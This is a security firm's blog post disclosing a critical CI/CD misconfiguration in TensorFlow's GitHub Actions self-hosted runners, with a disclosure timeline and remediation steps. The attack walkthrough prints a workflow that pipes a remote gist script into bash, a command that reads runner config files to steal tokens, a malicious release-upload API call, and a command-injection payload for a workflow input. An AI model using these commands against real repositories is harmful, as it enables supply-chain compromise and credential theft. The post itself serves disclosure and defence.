Introduction

With the recent rise and adoption of artificial intelligence technologies, open-source frameworks such as TensorFlow are prime targets for attackers seeking to conduct software supply chain attacks. Over the last several years, Praetorian engineers have become adept at performing highly complex attacks on GitHub Actions CI/CD environments, designing proprietary tools to aid their attacks, and presenting their research at ShmooCon and BSides SF 2023.

At ShmooCon 2023, Praetorian released Gato, an open-source tool for GitHub Actions pipeline enumeration and attack, with a particular focus on self-hosted GitHub Actions runners. We ran the tool on large organizations to discover vulnerable repositories, and Gato identified TensorFlow as potentially vulnerable to a poisoned pipeline execution attack.

As a result of our research, we were able to identify a series of CI/CD misconfigurations that an attacker could abuse to conduct a supply chain compromise of TensorFlow releases on GitHub and PyPi by compromising TensorFlow’s build agents via a malicious pull request. Praetorian disclosed this vulnerability to Google, and it was accepted as a critical ‘Supply chain compromise’ vulnerability.

In this blog, we will discuss our methodology for identifying the vulnerability, walk through the underlying issues that caused the bug, and explain the steps an attacker could take to compromise TensorFlow releases. We will conclude with Tensorflow’s remediation steps and our thoughts on the overall process.

TensorFlow Description

TensorFlow is “an end-to-end open-source platform for machine learning. It has a comprehensive, flexible ecosystem of tools, libraries, and community resources that lets researchers push the state-of-the-art in ML and developers easily build and deploy ML-powered applications.” TensorFlow was originally developed by researchers and engineers working within the Machine Intelligence team at Google Brain to conduct research in machine learning and neural networks. Currently, TensorFlow has 180,000 stars on GitHub and is used by popular tech companies such as Google, Lenovo, Intel, and Qualcomm.

Impact

Exploiting these vulnerabilities allows an external attacker to:

  • Upload malicious releases to the official TensorFlow GitHub repository
  • Gain RCE on a self-hosted GitHub runner
  • Retrieve a GitHub Personal Access Token (PAT) for the tensorflow-jenkins user

GitHub Actions Background

Before we dive into the exploit, let’s take a minute to understand what we attacked. TensorFlow, like thousands of other organizations, uses GitHub Actions for their CI/CD process. GitHub Actions allow the execution of code specified within workflows as part of the CI/CD process.

For example, let’s say TensorFlow wants to run a set of tests when a GitHub user submits a pull request. TensorFlow can define these tests in a yaml workflow file, used by GitHub Actions, and configure the workflow to run on the `pull_request` trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way, repository maintainers don’t need to manually test everyone’s code before merging.

GitHub Actions workflows execute on two types of build runners. One type is GitHub’s hosted runners, which GitHub maintains and hosts in their own environment. The other class is self-hosted runners.

Self-Hosted Runners

Self-hosted runners are build agents hosted by end users running the Actions runner agent on their own infrastructure. As one would expect, securing and protecting the runners is the responsibility of end users, not GitHub. For this reason, GitHub recommends against using self-hosted runners on public repositories.

By default, when a self-hosted runner is attached to a repository or an organization runner group that a public repository has access to, any workflow running in that repository’s context can use that runner.

For workflows on default and feature branches, this isn’t an issue. Users must have write access to update branches within repositories. The problem is that this also applies to workflows from fork pull requests – this default setting allows any contributor to execute code on the self-hosted runner by submitting a malicious PR.

If the self-hosted runner is configured using the default steps, it will be a non-ephemeral self-hosted runner. This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the path, etc.) will persist.

Identifying the Vulnerability

Identifying Self-Hosted Runners

The first step in identifying this vulnerability was confirming the use of self-hosted runners. To identify self-hosted runners, we ran Gato, a tool developed by Praetorian. Among other things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub workflow files and run logs. Gato identified a persistent, self-hosted runner that ran ARM64 Linux CI builds. We looked at the TensorFlow repository to confirm the Gato output.

Gato Output

Confirming self-hosted runners in GitHub Actions logs.

Determining Workflow Approval Requirements

The second step was determining the workflow approval settings. The default setting for workflow execution from fork PRs is to require approval only for accounts that have not previously contributed to the repository. There is an option to allow workflow approval for all Fork PRs, including previous contributors, so we set out to discover the status of this setting. By viewing the pull request (PR) history, we found several PRs from previous contributors that triggered `pull_request` workflows without requiring approval. This indicated that workflow approval was not required for Fork PRs from previous contributors.

PR #61443 received no approvals, yet the ARM_CI workflow ran on `pull_request`.

Searching for Impact

Compromising self-hosted runners can have a wide range of impacts, from trivial to critical. We provide explicit steps to compromise the self-hosted runner below, but first, let’s understand TensorFlow’s use of GitHub Actions to determine the access an attacker would have if they compromised the self-hosted runner. By examining the workflow logs, we observed that self-hosted runners with the same name were used in multiple workflow runs. This meant the runner was non-ephemeral, so an attacker could persist on the runner even after their PR job finished by forking off their own process.

The “runner6” runner was used by several workflows. Additionally, this workflow contained a step that stopped old Docker containers, indicating the runner had executed previous jobs.

This particular runner was one of a handful of self-hosted runners in a TensorFlow runner group named `Default`. An attacker could use the malicious pull request to compromise any runner in this group or all at once using the `runs-on: matrix` strategy. Hypothetically, let’s say an attacker compromised the `runner6` runner. The impact of runner compromise typically depends on the permission levels of the `GITHUB_TOKEN` assigned to subsequent builds, branch protection settings in place for the repository, network positioning of the build machine, and repository secrets.

GITHUB_TOKEN Permissions

Typically, a workflow needs to checkout the repository to the runner’s filesystem, whether to run tests defined in the repository, commit changes, or even publish releases. To perform these operations, the workflow can use a `GITHUB_TOKEN`. `GITHUB_TOKEN` permissions can vary from read-only access to extensive write privileges over the repository. The important aspect is that if a workflow executes on a self-hosted runner and uses a `GITHUB_TOKEN`, then that token will be on the runner for the duration of that build. Searching through the workflow logs, we found that the `arm-ci-extended-cpp.yml` workflow also ran on the self-hosted runner. The logs confirmed that this workflow used a `GITHUB_TOKEN` with extensive write permissions.

This token would only be valid for the life of that particular build. However, there are techniques to extend the build length once you are on the runner. Because the `GITHUB_TOKEN` had the `Contents:write` permission, it could upload releases to https://github.com/tensorflow/tensorflow/releases/. An attacker that compromised one of these `GITHUB_TOKEN`s could add their own files to the Release Assets. For example, they could upload an asset claiming to be a pre-compiled, ready-to-use binary and add a release note with instructions to run and download the binary. Any users that downloaded the binary would then be running the attacker’s code. If the current source code assets are not pinned to the release commit, the attacker could overwrite those assets directly.

Branch Protection Settings

The contents:write permissions also meant an attacker could use the token to push code directly to the TensorFlow repository. However, TensorFlow’s default branches were protected, so an attacker would need to smuggle their code into a feature branch and hope that it got merged before detection. It is possible to modify the commit user when making a Git commit, so an attacker could attempt to attribute a commit to the feature branch author in order to hide their actions.

Network Positioning

It is difficult to determine the network access of a runner from run logs. In general, self-hosted runners could have access to the organization’s internal network or cloud environments. We did not confirm if this was the case with TensorFlow.

Repository Secrets

The TensorFlow repository used GitHub secrets to allow the runners to access sensitive systems during the automated release process. We analyzed the workflow files to determine which secrets the repository used.

While investigating the `arm-cd.yml` workflow, we noticed that it used the `AWS_PYPI_ACCOUNT_TOKEN` to authenticate to PyPi before uploading TensorFlow pip wheels and that this workflow ran on the self-hosted runner. This meant an attacker who compromised the runner could also compromise this secret.

An attacker could also use the GITHUB_TOKEN’s permissions to compromise the `JENKINS_TOKEN` repository secret, even though this secret was not used within workflows that ran on the self-hosted runners.

Executing the Attack

Given the risk of disrupting Google systems and the prominence of TensorFlow, we opted not to execute this attack in the wild. However, these are the steps we would have taken to compromise TensorFlow releases.

1.   Fix a Typo

First, we’d need to become a contributor to the TensorFlow repository. Becoming a contributor to a popular repository is typically a trivial task. For example, we could find a typo in a README and then submit a PR for the typo fix. Once the PR was merged into the main branch, we’d be a contributor. As of writing – TensorFlow has over 3,400 contributors.

2.   Implant the Runner

To take control of the runner, we would first fork the repository. In our fork, we’d remove all existing workflows that run on the `pull_request` trigger to minimize our presence in the workflow logs. Next, we’d add a new workflow file to deploy persistence on the build agent. Here is a workflow file we could use to retrieve a bash script and execute it on the self-hosted runner:

name: SH Runner POC
on:
pull_request
jobs:
unit-tests:
runs-on: [self-hosted, linux, ARM64]
steps:
- name: unit-tests
continue-on-error: true
run: |
curl -sSfL https://git.githubusercontent.com/ouruser/dummyval/shell.sh | bash

Our bash script, stored in a GitHub gist, could be any Command-and-Control (C2) system, but one that we’ve had success with is installing our own self-hosted GitHub runner on the runner and then using a C2 repository with a simple workflow to execute commands. This method ensures our C2 payload will evade EDR and won’t get blocked by any network or firewall restrictions because it uses the same communication mechanisms as the underlying runner. Once we created our payload, we’d submit a draft PR from our TensorFlow fork. The draft status would prevent a request from being sent to code owners from the change to the workflow yaml file. After receiving our C2 callback, we’d force-push the code in the draft PR back to the main commit. The following commands will close the PR and hide obvious indications of malicious activity.

git reset --soft HEAD~1
git push --force

3.   Upload Release to GitHub

Once we were on the runner, we’d pivot to stealing secrets. We’d monitor the workflow logs to wait for a build to execute on the runner that was not from a fork PR. When that occurred, we’d run the following command to steal the `GITHUB_TOKEN` from the runner’s working directory:

find /home/ubuntu/actions-runner/_work -type f -name config | xargs cat

Using the GitHub token, we could execute the following API request to upload a malicious binary to a GitHub release:

curl -L \
-X POST \
-H "Accept: application/vnd.github+json" \
-H "Authorization: Bearer $STOLEN_TOKEN" \
-H "X-GitHub-Api-Version: 2022-11-28" \
-H "Content-Type: application/octet-stream" \
"https://uploads.github.com/repos/tensorflow/tensorflow/releases/:release_id:/assets?name=:malicious_release:" \
--data-binary ":path_to_local_malicious_release:"

4.   Steal PyPi Credentials

To compromise PyPi credentials, we’d monitor workflow logs for the `arm-cd.yml` workflow to run on the compromised runner. While it was running, we’d monitor running processes or dump the runner’s memory to retrieve the PyPi token. An attacker could use these credentials to authenticate to PyPi and upload our malicious wheel.

5.   Steal Jenkins Token GitHub PAT

Lastly, we’d compromise a GITHUB_TOKEN and abuse it to steal the JENKINS_TOKEN secret. This secret is not used by a self-hosted runner, but there was a way to steal it using the GITHUB_TOKEN and a `workflow_dispatch` event. The JENKINS_TOKEN is a GitHub PAT for the tensorflow-jenkins user (https://github.com/tensorflow-jenkins)

The `release-branch-cherrypick.yml` workflow uses the JENKINS_TOKEN secret and runs on `workflow_dispatch`. In order to steal this secret, we would need to execute code within this workflow run, and steal the token from the runner’s memory. The GITHUB_TOKEN cannot alter workflow files, even with full write permissions, so we would need to find a way to control the code executed by the workflow.

If we look at the workflow file, it contains two string input parameters:

name: Release Branch Cherrypick
on:
workflow_dispatch:
inputs:
# We use this instead of the "run on branch" argument because GitHub looks
# on that branch for a workflow.yml file, and we'd have to cherry-pick
# this file into those branches.
release_branch:
description: 'Release branch name (e.g. r2.9)'
required: true
 type: string
 git_commit:
description: 'Git commit to cherry-pick'
required: true
type: string

The workflow also contained a run step:

name: Get some helpful info for formatting
id: cherrypick
run: |
git config --global user.name "TensorFlow Release Automation"
git config --global user.email "jenkins@tensorflow.org"
git fetch origin master
git cherry-pick ${{ github.event.inputs.git_commit }}
echo "SHORTSHA=$(git log -1 ${{ github.event.inputs.git_commit }} --format="%h")" >> "$GITHUB_OUTPUT"
echo "TITLE=$(git log -1 ${{ github.event.inputs.git_commit }} --format="%s")" >> "$GITHUB_OUTPUT”

If you’ve read Long Live the Pwn Request: Hacking Microsoft GitHub Repositories and More, or are familiar with GitHub Actions injection, you might see where this is going. Since the `git_commit` value is passed directly into the script, it is possible to inject code into the run step.

From here, we would issue a dispatch event using GitHub’s REST API containing an injection payload, the payload could look like this:

Hacked;{curl,-sSfL,gist.githubusercontent.com/Path/To/Your/payload.sh}${IFS}|${IFS}bash;exit 0

The Gist would contain code to steal the secret from the workflow. There are several known techniques to accomplish this, as documented by Karim Rahal in Leaking Secrets from GitHub Actions. Gato would then be able to enumerate the PAT access and scope to search for lateral movement opportunities.

Remediation

TensorFlow remediated these vulnerabilities by requiring approval for workflows submitted from all fork PRs, including the PRs of previous contributors. Additionally, TensorFlow changed the `GITHUB_TOKEN` permissions to read-only for workflows that ran on self-hosted runners.

With these new controls, an attacker would have to smuggle their malicious code into a PR and hope the repository maintainer doesn’t notice it when they approve their workflow. Then, the impact of self-hosted runner compromise would be limited because they couldn’t use the `GITHUB_TOKEN` to perform any write operations.

Submission Timeline

August 1st, 2023 – Report Submitted to Google VRP

August 2nd, 2023 – Report Triaged

August 14th, 2023 – Report Accepted

August 22nd, 2023 – Awarded as a “Supply Chain compromise” within Google’s “Standard OSS Projects” tier.

December 20th, 2023 – Marked as Fixed – this simply means that Google closed all tickets created as a result of this report, the attack path was mitigated in August when Google changed the PR workflow approval setting.

The vulnerability reporting process was very smooth and Google’s security team was able to fully understand the vulnerability and its risks despite us not overtly exploiting the vulnerability. This is not always the case with large organization’s security disclosure programs, and we’d like to give Google a shout out for scoping their VRP to include repository configurations and Actions workflows.

Mitigation Steps

In general, the best way to use self-hosted runners and protect the repository from these attacks is to take the following steps:

  1. Require approval to run workflows on the `pull_request` trigger for all outside fork PRs, even if they are contributors.
  2. Move the self-hosted runner group from the repository to an organization group (such as one only for public repositories), and configuring the group to only run on specific workflows that have already been committed to a protected branch, then reference that workflow as a reusable workflow.
  3. If possible, ensure that only ephemeral self-hosted runners (1 build, 1 clean runner) are used for public repository builds.

Conclusion

Praetorian performs proactive vulnerability research to identify vulnerabilities in commonly used applications. As part of our research into TensorFlow, we identified a series of CI/CD misconfigurations which when combined lead to compromise of TensorFlow releases.

Similar CI/CD attacks are on the rise as more organizations automate their CI/CD processes. AI/ML companies are particularly vulnerable as many of their workflows require significant compute power that isn’t available in GitHub-hosted runners, thus the prevalence of self-hosted runners.

References